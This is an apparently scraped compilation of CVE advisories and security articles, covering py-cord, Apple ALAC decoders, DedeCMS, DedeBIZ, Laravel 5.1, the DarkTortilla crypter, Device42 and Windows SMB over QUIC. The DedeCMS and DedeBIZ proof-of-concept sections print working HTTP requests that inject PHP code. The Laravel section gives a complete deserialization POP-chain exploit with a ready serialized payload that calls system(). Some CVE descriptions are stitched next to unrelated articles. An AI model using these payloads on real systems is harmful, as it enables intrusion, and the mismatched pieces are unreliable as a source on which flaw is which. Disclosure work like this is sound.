### Impact
py-cord is a an API wrapper for Discord written in Python. Bots using py-cord version 2.0.0 are vulnerable to remote shutdown if they are added to the server with the `application.commands` scope without the `bot` scope. Currently, it appears that all public bots that use slash commands are affected.

### Patches
This issue has been patched in version 2.0.1.

### Workarounds
There are currently no recommended workarounds - please upgrade to a patched version.

### References
https://github.com/Pycord-Development/pycord/pull/1568

### For more information
If you have any questions or comments about this advisory:
* Open an issue in [our GitHub](https://github.com/Pycord-Development/pycord)
* Email us at [support@pycord.dev](mailto:support@pycord.dev)

**Impact**

py-cord is a an API wrapper for Discord written in Python. Bots using py-cord version 2.0.0 are vulnerable to remote shutdown if they are added to the server with the application.commands scope without the bot scope. Currently, it appears that all public bots that use slash commands are affected.

**Patches**

This issue has been patched in version 2.0.1.

**Workarounds**

There are currently no recommended workarounds - please upgrade to a patched version.

**References**

Pycord-Development/pycord#1568

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in our GitHub
*   Email us at support@pycord.dev

**References**

*   GHSA-qmhj-m29v-gvmr
*   Pycord-Development/pycord#1568

GHSA-qmhj-m29v-gvmr: Bots using py-cord as Discord API wrapper are vulnerable to shutdowns through remote code execution

The vulnerability causing from insufficient verification procedures for downloaded files during WebCube update. Remote attackers can bypass this verification logic to update both digitally signed and unauthorized files, enabling remote code execution.

**KISA 인터넷 보호나라&KrCERT**

\[나주본원\] (58324) 전라남도 나주시 진흥길 9 한국인터넷진흥원 대표번호 : 1433-25(수신자 요금 부담)

\[서울청사\] (05717) 서울시 송파구 중대로 135 (가락동) IT벤처타워 \[해킹ㆍ스팸개인정보침해 신고 118\]

Copyright(C) 2021 KISA. All rights reserved.

CVE-2022-23764: KISA 인터넷 보호나라&KrCERT

In Sony Xperia series 1, 5, and Pro, an out of bound memory access can occur due to lack of validation of the number of frames being passed during music playback.

May 18, 2022

**Research by:** Slava Makkaveev, Netanel Ben Simon

**Introduction**

The Apple Lossless Audio Codec (ALAC) is an audio coding format developed by Apple Inc. in 2004 for lossless data compression of digital music. After initially keeping it proprietary, in late 2011 Apple made the codec open source. Since then, the ALAC format has been embedded in many non-Apple audio playback devices and programs, including Android-based smartphones, and Linux and Windows media players and converters.

The open source ALAC decoder contains serious vulnerabilities. Apple keeps updating the proprietary version of the decoder and fixing security issues, but the shared code has not been patched since 2011. Many third-party vendors use the Apple-supplied code as the basis for their own ALAC implementations, and it’s fair to assume that many of them do not maintain the external code.

We discovered that MediaTek and Qualcomm, the two largest mobile chipset makers, ported the vulnerable ALAC code into their audio decoders, which are used in more than half of all smartphones worldwide. The ALAC issues we found could be used by an attacker for RCE on a mobile device through a malformed audio file. In addition, an unprivileged Android app can use these vulnerabilities to escalate its privileges and gain access to media data and user conversations.

Our goal was not to find all the projects that integrate the ALAC decoder, but we easily found several popular Ubuntu packages in the Universe repository that are also based on the vulnerable ALAC code and can be targeted by an attacker for RCE on an Ubuntu machine.

In this study, we focus on mobile devices.

**OpenMAX Codecs**

Open Media Acceleration (OpenMAX or OMX) is the set of C-language programming interfaces that provides abstractions useful for multimedia processing.

On Android devices, the Stagefright media playback engine integrates OpenMAX to recognize and use custom hardware-based multimedia codecs.

**Figure 1:** OpenMAX in Android media.

While Android provides built-in software codecs for common media formats, a hardware manufacturer can add an OpenMAX codec to decode/encode a specific one.

All media codecs presented on the device are listed in the /vendor/etc/media_codecs.xml file. According to the OpenMax specification, the codec name and content type must be declared for each codec.

**Figure 2:** Built-in software codecs.

An OpenMAX codec is a dynamic library that implements the corresponding decoding/encoding logic. The relationship table between the codec name and the library name is built into the OpenMAX Core library /vendor/lib/libOmxCore.so. On MediaTek devices, the /vendor/etc/mtk_omx_core.cfg configuration file contains this table in text format.

**Figure 3:** Core configuration.

Both MediaTek and Qualcomm provide custom OpenMAX decoders for the ALAC format. The ALAC declaration is shown in Figure 4, where the first line refers to MediaTek devices and the second line to those belonging to Qualcomm.

**Figure 4:** ALAC decoder declaration.

/vendor/lib/libMtkOmxAlacDec.so is the OpenMAX ALAC library on MediaTek devices and /vendor/lib/libOmxAlacDecSw.so is the library on Qualcomm. Media service /vendor/bin/hw/[email protected] loads the ALAC library when requested by an Android app, and then calls it to decode the supplied frames.

A malicious .m4a audio file can be used to attack a device even when played in a safe app based on the Android media framework. In addition, a malicious app can use a harmful frame to attack the privileged [email protected] service.

**Requesting frame decoding from the app**

The Android framework provides the android.media.MediaCodec class to access low-level media codecs.

We can create the ALAC decoder by using its name.

The configure method can be used to tune the decoder. A Codec-specific Data (csd-0) array allows us to set the frame length and bit depth parameters that we want to control in order to exploit the vulnerabilities.

To pass an arbitrary frame to the decoder for processing:

The Android app does not require any permissions to initiate decoding. To attack the media service, all we need to do is to prepare a malformed frame that causes the vulnerability.

**The ALAC vulnerabilities****MediaTek**

A quick look at the libMtkOmxAlacDec.so library showed that it is more likely based on the Shairport source code than on the code published by Apple. In fact, both sources are quite similar and have the same security issues.

The MtkOmxAlacDec::InitAlacDecoder method is responsible for initializing the ALAC decoder based on the csd-0 information provided by the app or included in the audio file header. The method calls the alac_init function, which fills an internal object with the audio parameters and allocates working buffers to store the decoded data.

The setinfo_max_samples_per_frame field of the alac object is initialized with the frame length (the first DWORD of the csd-0), and the setinfo_sample_size field is initialized with the bit depth.

The frame length times 4 of the heap memory is allocated as the outputsamples_buffer_a buffer. No integer overflow check is performed. In the 32-bit media server, if the provided frame length is greater than or equal to 0x40000000, the wrong amount of memory is allocated.

The MtkOmxAlacDec::DecodeAudio method is responsible for decoding the audio frame. It calls the alac_decode_frame function passing the alac object, the decoding frame, and an output buffer for decoded data as arguments.

The variable outputsamples is the number of samples to decode. As you can see, it is initialized with the setinfo_max_samples_per_frame at the beginning of the function, which is the maximum possible value of samples per frame. However, this variable can be corrected by the actual number of samples, the value of which is encoded in the frame itself. There are no validations associated with the outputsamples, so an invalid number could be provided. For example, in the frame in Figure 5, the number of samples is 0x41414141.

**Figure 5:** Malformed ALAC frame.

Several code snippets like the one shown below are implemented in the alac_decode_frame function to decode the frame data.

As you can see, outputsamples \* setinfo_sample_size bits are decoded from the input frame into the outputsamples_buffer_a buffer, the size of which is setinfo_max_samples_per_frame \* 4. We control all the involved values: the outputsamples, the setinfo_sample_size, the setinfo_max_samples_per_frame, and the decoding content.

For a heap data leak, we set the outputsamples and the setinfo_max_samples_per_frame to be larger than the input frame. In this case, the contents of the heap after the frame buffer are “decoded” to the outputsamples_buffer_a, which is then copied to the output buffer.

To overwrite the heap, we set the setinfo_max_samples_per_frame to be smaller than the input frame. In this case, the data is decoded outside the outputsamples_buffer_a buffer as determined by what we set in the outputsamples.

In Figure 6, you can see the crash dump caused by the malformed frame shown in Figure 5. The test device is the Xiaomi Redmi Note 9T 5G (MediaTek MT6853 Dimensity 800U 5G chipset) with MIUI Global 12.5.2.0 OS.

**Figure 6:** Crash dump of MediaTek’s ALAC decoder.

All of the described vulnerabilities can be exploited as they provide both read and write primitives.

**Qualcomm**

The ALAC decoder implemented by Qualcomm has exactly the same issues as the MediaTek’s decoder.

The OpenMAX libOmxAlacDecSw.so library is a wrapper over the libAlacSwDec.so, which is based on the source code shared by Apple.

The ALACDecoder::Init method allocates the mMixBufferU buffer to store the decoded data. The buffer size is 4 times the frame length specified in the csd-0 and controlled by the attacker.

The ALACDecoder::Decode method decodes ALAC frames. Again, there is no verification of the number of samples provided in the frame.

Depending on the numSamples and the size of the input frame, the mMixBufferU buffer can be overflowed with the input frame or filled with leaked data.

In Figure 7, you can see the crash dump of Qualcomm’s ALAC decoder. The test device is the Sony Xperia XZ Premium.

**Figure 7:** Crash dump of Qualcomm’s ALAC decoder.

**Conclusion**

We discovered several vulnerabilities in the Apple lossless audio codec that are relevant for smartphones with MediaTek and Qualcomm chipsets. Two thirds of all smartphones sold in 2021 are vulnerable.

The issues we found could be used by an attacker for RCE on a mobile device via a malicious audio file, or for LPE from an unprivileged Android application. The attacker could gain access to user conversations and stored media.

MediaTek assigned CVE-2021-0674 and CVE-2021-0675 to the ALAC issues. The vulnerabilities were already fixed and published in the December 2021 MediaTek Security Bulletin. Qualcomm released the patch for CVE-2021-30351 in the December 2021 Qualcomm Security Bulletin.

Check Point’s customers _remain fully protected_ against such threats while using Harmony Mobile Security.

CVE-2022-23747: #ALHACK: One codec to hack the whole world - Check Point Research

DedeCMS v5.7.94 - v5.7.97 was discovered to contain a remote code execution vulnerability in member_toadmin.php.

**Dedecms has remote code execution**

*   Affected product: Dedecms V5.7.94 - V5.7.97
*   Attack type: Remote
*   Affected component: /dede/member\_toadmin.php
*   Description: DedeCMS v5.7.94 was discovered to contain a remote code execution vulnerability in member\_toadmin.php.
*   Vendor confirmed or acknowledged: Confirmed
*   Fix information: Not available

    GET /dede/member_toadmin.php?id=%27.phpinfo();?%3E&typeids=1&dopost=toadmin&safecode=3373702420f2a357b12e6bc4&randcode=13967 HTTP/1.1
    Host: www.dedecms5794.com
    Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=lteb30kl960vhad3q6k4psjok4; _csrf_name_96c0ebe6=f97c33dd6471fdad17230e95a4bb1629; _csrf_name_96c0ebe61BH21ANI1AGD297L1FF21LN02BGE1DNG=c93476e2cd70eacb
    Connection: close
    

**Details**

DedeCMS v5.7.94 added the periodic password change reminder function to the file /dede/member_toadmin.php to comply with relevant web security regulations.

    // Regular password change reminders
    $arr\_password = array();
    $filename = DEDEDATA . '/password.data.php';
    if (file\_exists($filename)) {
        require\_once(DEDEDATA . '/password.data.php');
        $arr\_password = json\_decode($str\_password, true);
    }

    $timestamp = time();
    $arr\_password\[$id\] = "{$timestamp}";
    $content = "<?php\\r\\n\\$str\_password='" . json\_encode($arr\_password) . "';";

    $fp = fopen($filename, 'w') or die("写入文件 $filename 失败，请检查权限！");
    fwrite($fp, $content);
    fclose($fp);

When the input id is ', the variable $id is assigned the value \' by function _RunMagicQuotes in the file /include/common.inc.php.

    function \_RunMagicQuotes(&$svar) {
        if (!get\_magic\_quotes\_gpc()) {
            if (is\_array($svar)) {
                foreach ($svar as $\_k => $\_v) $svar\[$\_k\] = \_RunMagicQuotes($\_v);
            } else {
                if (strlen($svar) > 0 && preg\_match('#^(cfg\_|GLOBALS|\_GET|\_POST|\_COOKIE|\_SESSION)#', $svar)) {
                    exit('Request var not allow!');
                }
                $svar = addslashes($svar);
            }
        }
        return $svar;
    }

    foreach (array('\_GET', '\_POST', '\_COOKIE') as $\_request) {
        foreach ($$\_request as $\_k => $\_v) {
            if ($\_k == 'nvarname') ${$\_k} = $\_v;
            else ${$\_k} = \_RunMagicQuotes($\_v);
        }
    }

When $arr_password with $id is written to the file /data/password.data.php, function json_encode encodes $id from \' to \\', which causes escaping single quote.

Therefore, the attacker only needs to input id with '. followed by the codes he wishes to execute and configure the parameters (typeids, dopost, safecode and randcode) to write codes to the file /data/password.data.php and cause remote code execution.

CVE-2022-36216: Vulnerability/member_toadmin.poc.md at main · whitehatl/Vulnerability

DedeCMS v5.7.93 - v5.7.96 was discovered to contain a remote code execution vulnerability in login.php.

Permalink

**Dedecms has remote code execution**

*   Affected product: Dedecms V5.7.93 - V5.7.96
*   Attack type: Remote
*   Affected component: /dede/login.php
*   Description: DedeCMS v5.7.93 was discovered to contain a remote code execution vulnerability in login.php.
*   Vendor confirmed or acknowledged: Confirmed
*   Fix information: V5.7.97 UTF-8正式版20220708安全及功能更新补丁

    POST /dede/login.php HTTP/1.1
    Host: dedecms5793
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=e9ag7oevkh77gnko3cdmt7mbc2
    
    dopost=login&userid=%5C%27.phpinfo%28%29%3B%3F%3E&pwd=123&validate=hw0k
    

**Details**

DedeCMS v5.7.93 added the login failure lock function to file /dede/login.php to comply with relevant web security regulations. When a user fails to login, the failure message will be written to file /data/login.data.php to record the number of failed login attempts for that user.

    $arr\_login\[$userid\] = "{$count},{$timestamp}";
    $content = "<?php\\r\\n\\$str\_login='" . json\_encode($arr\_login) . "';";

    $fp = fopen($filename, 'w') or die("写入文件 $filename 失败，请检查权限！");
    fwrite($fp, $content);
    fclose($fp);
                

The file write operation does not filter the write content sufficiently, allowing an attacker to write malicious code to the file by user name and cause remote code execution.

CVE-2022-35516: Vulnerability/Login.poc.md at main · whitehatl/Vulnerability

DedeBIZ v6 was discovered to contain a remote code execution vulnerability in sys_info.php.

Permalink

Cannot retrieve contributors at this time

**Dedebiz has remote code execution**

*   Affected product: DedeBIZ V6
*   Attack type: Remote
*   Affected component: /admin/sys\_info.php
*   Description: DedeBIZ v6.\* was discovered to contain a remote code execution vulnerability in sys\_info.php.
*   Vendor confirmed or acknowledged: Confirmed
*   Fix Information: Not available

    GET /admin/sys_info.php?dopost=add&nvarname=test&nvarvalue=phpinfo()&vartype=number HTTP/1.1
    Host: www.dedebiz6.com
    Cookie:  PHPSESSID=bs4vp003uqilf3pj1al024egs2; DedeUserID=1; DedeUserID__ckMd5=6d2e834b19e2030a; DedeLoginTime=1657701678; DedeLoginTime__ckMd5=34d8cf865664d363
    Connection: close
    

**Details**

DedeBIZ v6.\* backend admin/sys\_info.php has the function of adding variables, but the filtering of variables of type 'number' is not strict when writing to the database and php files, resulting in remote code execution.

while ($row = $dsql\->GetArray()) {
    if ($row\['type'\] == 'number') {
        if ($row\['value'\] == '') $row\['value'\] = 0;
        fwrite($fp, "\\${$row\['varname'\]} = ".$row\['value'\].";\\r\\n");
    } else {
        ...
    }
}
                

**Suggestions for fixing**

For variables with vartype as 'number', check if it is a number or force it to be a number before writing to database and php files.

CVE-2022-36215: Vulnerability/sys_info.poc.md at main · whitehatl/Vulnerability

A vulnerability was found in laravel 5.1 and classified as problematic. This issue affects some unknown processing. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206501 was assigned to this vulnerability.

**Laravel 5.1 POP Chain**

composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"  
app/Http/Controllers/UsersController.php adding a controller UsersController

<?php
namespace App\\Http\\Controllers;
use Illuminate\\Http\\Request;
class UsersController extends Controller
{

    /\*\*
     \* 创建一个新用户。
     \*
     \* @param  Request  $request
     \* @return Response
     \*/
    public function store(Request $request)
    {  
        echo "Please post cmd to unserialize";

        $payload\=$request\->input("cmd");

        unserialize($payload);
        //
    }
}
?>

routes/web.php  
Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);

<?php
use Illuminate\\Support\\Facades\\Route;
/\*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
\*/

Route\==post('/test',\[\\App\\Http\\Controllers\\UsersController\==class,'store'\]);

**EXP**

<?php

namespace Illuminate\\Auth;
class RequestGuard{
	protected $provider;
	protected $callback;
	protected $request;
	public function \_\_construct(){
		$this\->callback = 'call\_user\_func';
		$this\->request = 'system';
		$this\->provider = 'calc';
	}
}

namespace Illuminate\\View;
use Illuminate\\Auth\\RequestGuard;
class InvokableComponentVariable{
	protected $callable\=\[\];
	public function \_\_construct(){
		$this\->callable\=\[new RequestGuard,'user'\];
	}
}
namespace SebastianBergmann\\RecursionContext;
use Illuminate\\View\\InvokableComponentVariable;
final class Context{
	private $arrays = \[\];
	public function \_\_construct(){
		$this\->arrays\=new InvokableComponentVariable;
	}
}
echo urlencode(serialize(new Context));
?>

O%3A42%3A%22SebastianBergmann%5CRecursionContext%5CContext%22%3A1%3A%7Bs%3A50%3A%22%00SebastianBergmann%5CRecursionContext%5CContext%00arrays%22%3BO%3A42%3A%22Illuminate%5CView%5CInvokableComponentVariable%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00callable%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A28%3A%22Illuminate%5CAuth%5CRequestGuard%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00provider%22%3Bs%3A8%3A%22calc.exe%22%3Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A14%3A%22call_user_func%22%3Bs%3A10%3A%22%00%2A%00request%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A4%3A%22user%22%3B%7D%7D%7D

CVE-2022-2870: Laravel5.1 Unserialize RCE · Issue #2 · beicheng-maker/vulns

The stealthy crypter, active since 2015, has been used to deliver a wide range of information stealers and RATs at a rapid, widespread clip.

Researchers this week warned of a sophisticated, evasive crypter that several threat actors are using to distribute a range of information stealers and remote-access Trojans (RATs).

The crypter, dubbed "DarkTortilla," is pervasive and persistent, and it packs multiple features designed to help it avoid anti-malware and forensics tools. The .NET-based crypter can be configured to deliver numerous malicious payloads, and can potentially be used to plant illegal content on a victim's system. It's also capable of tricking both users and sandboxes into believing it is benign.

Researchers from Secureworks, who first spotted DarkTortilla last October, believe it has been active since at least August 2015. Rob Pantazopoulos, senior security researcher at Secureworks' Counter Threat Unit (CTU), says threat actors have used DarkTortilla in the past to deliver a wide range of other malware, including Remcos, BitRat, FormBook, WarzoneRat, Snake Keylogger, LokiBot, QuasarRat, NetWire, and DCRat. On a few occasions, the crypter has also been used in targeted attacks to deliver payloads such as Metaspolit and Cobalt Strike.

Most recently, it's been used mainly to deliver malware such as the RATs AgentTesla, NanoCore, and AsyncRat, as well as the information-stealer RedLine.

Somewhat unusually for such a widely used malware distributor, there have been just nine instances where a threat actor used DarkTortilla to distribute ransomware — and seven of those involved the Babuk ransomware family.

**Pervasive and Versatile**

"DarkTortilla first came into focus for Secureworks in October 2021 when we detected a threat actor leveraging a Microsoft Exchange remote code execution vulnerability (CVE-2021-34473) to execute malicious PowerShell within customer environments," Pantazopoulos says. "The attack chain eventually led to the download and execution of the .NET malware that we now call DarkTortilla."

Secureworks researchers said that between January 2021 through May, they spotted an average of 93 unique DarkTortilla samples being uploaded to VirusTotal every week. The security vendor says it has counted more than 10,000 unique DarkTortilla samples since it began tracking the malware. Like many malware tools, attackers have been using spam emails with file attachments such as .ISO, .ZIP, and .IMG to distribute DarkTortilla. In some instances, they have also used malicious documents to deliver the malware.

**Highly Configurable**

What makes DarkTortilla dangerous is its high degree of configurability and the various anti-analysis and anti-tampering controls it packs to make detection and analysis highly challenging. The malware, for instance, uses open source tools such as DeepSea and ConfuserEX to obfuscate its code, and its main payload gets executed entirely in memory, Pantazopoulos says.

Also, DarkTortilla's initial loader, which is the only component of the malware that touches the file system, contains minimal functionality, making it hard to spot.

"Its only job is to retrieve, decode, and load the core processor, which is typically stored as encrypted data within the initial loader's resources," he notes. The code itself is generic in nature and tends to vary between samples depending on the obfuscation tools that have been applied. As a result, Secureworks has only been able to identify a handful of consistent markers for the malware — which too are likely to change soon, the researcher says.

The security vendor's analysis of DarkTortilla showed that it migrates execution to the Windows %TEMP% directory during initial execution, a feature that Pantazopoulos says is troublesome for defenders. One benefit in doing this — from the attacker's perspective — is that it allows DarkTortilla to hide on an infected system.

"Second, if the %Delay% configuration element is defined within the DarkTortilla configuration, the amount of time from when DarkTortilla is run to when the main payload gets executed increases exponentially," he says. For instance, with just a few configuration changes, attackers can set the malware to execute its main payload several minutes after the DarkTortilla executable is run.

"The impact here is that, when defenders submit the sample to most popular sandboxes, the sample will likely timeout without doing anything malicious and the sandbox may report that the sample was benign."

**Bag of Tricks**

DarkTortilla's bag of tricks includes a message box that attackers can use to display customizable, fake messages about the malware being a legitimate application, about the execution failing, or about the software being corrupted. The goal here, again, is to trick users into believing the malware that is executing on their system is benign.

"From a features perspective, we find DarkTortilla's ability to deliver numerous additional payloads in the form of 'addons' to be very interesting," Pantazopoulos notes. In one instance, the configured addon was a benign decoy Excel spreadsheet that opened as the malware was executing in the background. In another instance, Secureworks discovered the configured addon was a legitimate application installer that ran when the malware was executing. Thus the victim assumed they were installing a legitimate application.

In a handful of instances, Secureworks observed threat actors using DarkTortilla to drop addons to disk that were then not run later. Of the more than 600 DarkTortilla addons that Secureworks has observed so far, only seven were dropped to disk and not executed.

The file types ranged from executables and configuration files to PDF documents and were typically dropped to the victim's My Documents folder. "Though we've yet to see it used this way, it is very possible that a threat actor could leverage DarkTortilla to plant illegal content on a victim's file system without their knowledge," Pantazopoulos says.

'DarkTortilla' Malware Wraps in Sophistication for High-Volume RAT Infections

OS Command Injection vulnerability in the db_optimize component of Device42 Asset Management Appliance allows an authenticated attacker to execute remote code on the device. This issue affects: Device42 CMDB version 18.01.00 and prior versions.

_Ad_ One product to protect all your devices, without slowing them down.  
Free 90-day trial

Modern IT environments rely on automatic discovery, asset management, and dependency mapping.

Whether based on agents or completely agentless, these tools allow IT infrastructure managers to create a complete inventory of networked devices, servers and hypervisors, applications, and more.

While investigating the Device42 platform, we found multiple severe security issues exploitable by attackers with any level of access within the host network.

By exploiting these issues, an attacker could impersonate other users, obtain admin-level access in the application (by leaking session with an LFI) or obtain full access to the appliance files and database (through remote code execution).

By daisy-chaining multiple vulnerabilities, an attacker can achieve remote code execution with root privileges starting from an unauthenticated session:

*   Authentication bypass with an unauthenticated local file inclusion vulnerability discovered in the Exago reports component by extracting valid session IDs of authenticated users
*   Remote code execution by creating an autodiscovery task (\*nix/CISCO NX-OS) with crafted RCE payload as username

Besides these critical vulnerabilities, we also identified a remote code execution vulnerability in the appliance manager component.

The full research paper is available for download below:

Download the Whitepaper

**Mitigation**

Part of our mission to keep customers safe is to identify vulnerabilities in applications and IoT devices and then to responsible disclose our findings to the affected vendors so they can work on fixes. Once these fixes become available, they should be immediately deployed by organizations already running vulnerable versions of the app. Vulnerable instances of the Device42 appliance should be updated to version 18.01.00 to prevent exploitation.

_We would like to extend our thanks to the Device42 team for working with us and quickly making a fix available._

CVE-2022-1410: A Red Team Perspective on the Device42 Asset Management Appliance

The security flaw tracked as CVE-2022-30216 could allow attackers to perform server spoofing or trigger authentication coercion on the victim.

Researchers have discovered a vulnerability in the remote procedure calls (RPC) for the Windows Server service, which could allow an attacker to gain control over the domain controller (DC) in a specific network configuration and execute remote code.

Malicious actors could also exploit the vulnerability to modify a server's certificate mapping to perform server spoofing.

Vulnerability CVE-2022-30216, which exists in unpatched Windows 11 and Windows Server 2022 machines, was addressed in July's Patch Tuesday, but a report from Akamai researcher Ben Barnes, who discovered the vulnerability, offers technical details on the bug.

The full attack flow provides full control over the DC, its services, and data.

**Proof of Concept Exploit for Remote Code Execution**

The vulnerability was found in SMB over QUIC, a transport-layer network protocol, which enables communication with the server. It allows connections to network resources such as files, shares, and printers. Credentials are also exposed based on belief that the receiving system can be trusted.

The bug could allow a malicious actor authenticated as a domain user to replace files on the SMB server and serve them to connecting clients, according to Akamai. In a proof of concept, researchers exploited the bug to steal credentials via authentication coercion.

Specifically, they set up an NTLM relay attack. Now deprecated, NTLM uses a weak authentication protocol that can easily reveal credentials and session keys. In a relay attack, bad actors can capture an authentication and relay it to another server — which they can then use to authenticate to the remote server with the compromised user's privileges, providing the ability to move laterally and escalate privileges within an Active Directory domain.

"The direction we chose was to take advantage of the authentication coercion," Akamai security researchers Ophir Harpaz says. "The specific NTLM relay attack we chose involves relaying the credentials to the Active Directory CS service, which is responsible for managing certificates in the network."

Once the vulnerable function is called, the victim immediately sends back network credentials to an attacker-controlled machine. From there, attackers can gain full remote code execution (RCE) on the victim machine, establishing a launching pad for several other forms of attack including ransomware, data exfiltration, and others.

"We chose to attack the Active Directory domain controller, such that the RCE will be most impactful," Harpaz adds.

Akamai's Ben Barnea points out with this case, and since the vulnerable service is a core service on every Windows machine, the ideal recommendation is to patch the vulnerable system.

"Disabling the service is not a feasible workaround," he says.

**Server Spoofing Leads to Credential Theft**

Bud Broomhead, CEO at Viakoo, says in terms of negative impact to organizations, server spoofing is also possible with this bug.

"Server-spoofing adds additional threats to the organization, including man-in-the-middle attacks, data exfiltration, data tampering, remote code execution, and other exploits," he adds.

A common example of this can be seen with Internet of Things (IoT) devices tied to Windows application servers; e.g., IP cameras all connected to a Windows server hosting the video management application.

"Often IoT devices are set up using the same passwords; gain access to one, you've gained access to them all," he says. "Spoofing of that server can enable data integrity threats, including planting of deepfakes."

Broomhead adds that at a basic level, these exploitation paths are examples of breaching internal system trust — especially in the case of authentication coercion.

**Distributed Workforce Broadens Attack Surface**

Mike Parkin, senior technical engineer at Vulcan Cyber, says while it doesn't appear that this issue has yet been leveraged in the wild, a threat actor successfully spoofing a legitimate and trusted server, or forcing authentication to an untrusted one, could cause a host of problems.

"There are a lot of functions that are based on the 'trust' relationship between server and client and spoofing that would let an attacker leverage any of those relationships," he notes.

Parkin adds a distributed workforce broadens the threat surface considerably, which makes it more challenging to properly control access to protocols that shouldn't be seen outside the organization's local environment.

Broomhead points out rather than the attack surface being contained neatly in data centers, distributed workforces have also expanded the attack surface physically and logically.

"Gaining a foothold within the network is easier with this expanded attack surface, harder to eliminate, and provides potential for spillover into the home or personal networks of employees," he says.

From his perspective, maintaining zero trust or least privileged philosophies reduces the dependence on credentials and the impact of credentials being stolen.

Parkin adds that reducing the risk from attacks like this requires minimizing the threat surface, proper internal access controls, and keeping up to date on patches throughout the environment.

"None of them are a perfect defense, but they do serve to reduce the risk," he says.

Tag

#rce